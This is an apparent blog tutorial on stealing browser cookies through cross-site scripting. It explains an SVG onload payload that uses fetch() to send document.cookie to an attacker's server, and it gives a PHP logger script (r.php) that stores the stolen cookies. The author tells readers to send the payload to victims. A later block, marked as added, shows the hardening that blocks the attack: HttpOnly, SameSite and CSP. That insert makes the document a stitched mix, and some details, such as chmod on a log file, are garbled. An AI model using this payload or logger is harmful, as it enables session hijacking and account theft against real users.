How are you doing, bros? Today I am gonna show you how to steal cookies with my love, XSS. Let's go!
We will use these six things:
- Fetch API
- Our Server
- document.cookie property
- A Vulnerable Website
- A Sex Doll (Optional)
The Fetch API is used to request resources such as web pages, and the document.cookie property returns the cookies of the current document.
Step 1. Copy the following code thingy
Step 2. Most important step
Replace //attacker:port/ with your server name and port.
Step 3. Hack ’em!
Yeah, send it to your victim and check your server logs.
What the actual fuck?
- We are injecting an HTML element, i.e. an SVG, into the webpage.
- onload is an event handler which gets triggered when the element it is attached to gets loaded.
- fetch() is used to make a request to a webpage.
- attacker:port is our server and port, so it makes a request to us.
- %2B is the URL-encoded form of +.
- cookie is the same as document.cookie here, because inside an inline event handler the name resolves against the document; it returns the cookie.
Putting it together: We are injecting a payload which, when loaded, makes a request to our server that includes the cookie.
No! Who the fuck has time to check server logs and shit? Let's try plan B.
Step 1. Create Recording Mechanism
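Open your text editor and paste the following code:
```php
<?php
// Take the request URI and strip the script prefix, leaving the value that was sent
$url = $_SERVER['REQUEST_URI'];
$new = str_replace('/r.php?=', '', $url);
// Open log.txt for writing ('w' truncates the file on every request)
$handle = fopen('log.txt', 'w') or die('Cannot open file: '.'log.txt');
fwrite($handle, $new);
?>
```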
and save it as r.php
Now create a blank text file named log.txt, navigate to it in your terminal and enter chmod +x log.txt.
Step 2. That’s it
Host this file on your server and use the following payload:
Just send the payload to your victim and the cookie will be stored in log.txt.
Note: No need to include the port because you will be serving it on the default HTTP port, i.e. 80.
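Both variants above depend on the session cookie being readable through document.cookie and on the page being allowed to run an inline onload handler and fetch() another origin. The block below is an added example, not code from the original post, that shows the server-side settings which remove those preconditions; the cookie names, values and function names are constructed for illustration.

```javascript
// Build a Set-Cookie header for a session cookie (names/values are constructed samples).
function sessionCookie(name, value, { hardened }) {
  const parts = [`${name}=${encodeURIComponent(value)}`, 'Path=/'];
  if (hardened) {
    // HttpOnly: not exposed to document.cookie. Secure: sent over HTTPS only.
    // SameSite=Lax: not attached to cross-site subrequests.
    parts.push('HttpOnly', 'Secure', 'SameSite=Lax');
  }
  return parts.join('; ');
}

// Model of what page script reads from document.cookie for a set of
// Set-Cookie headers the browser has stored: HttpOnly cookies are left out.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .map((header) => header.split(';').map((part) => part.trim()))
    .filter(([, ...attrs]) => !attrs.some((a) => a.toLowerCase() === 'httponly'))
    .map(([pair]) => pair)
    .join('; ');
}

// Content-Security-Policy value for the response that serves the page.
function contentSecurityPolicy() {
  return [
    "default-src 'self'",
    "script-src 'self'",  // no 'unsafe-inline': inline handlers such as onload do not run
    "connect-src 'self'", // fetch()/XHR may only reach the page's own origin
  ].join('; ');
}

// Weak and hardened configuration side by side.
function demo() {
  const pref = 'theme=dark; Path=/'; // harmless preference cookie, left readable
  const weak = [sessionCookie('sid', 'constructed-session-id', { hardened: false }), pref];
  const hard = [sessionCookie('sid', 'constructed-session-id', { hardened: true }), pref];
  return {
    weak: scriptVisibleCookies(weak),
    hardened: scriptVisibleCookies(hard),
    csp: contentSecurityPolicy(),
  };
}

console.log(demo());
```

With the hardened cookie the session identifier never appears in document.cookie, and the policy stops both the inline handler and the cross-origin request independently of each other.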
Thanks for reading. I hope you enjoyed this tutorial.
Please check other tutorials as well.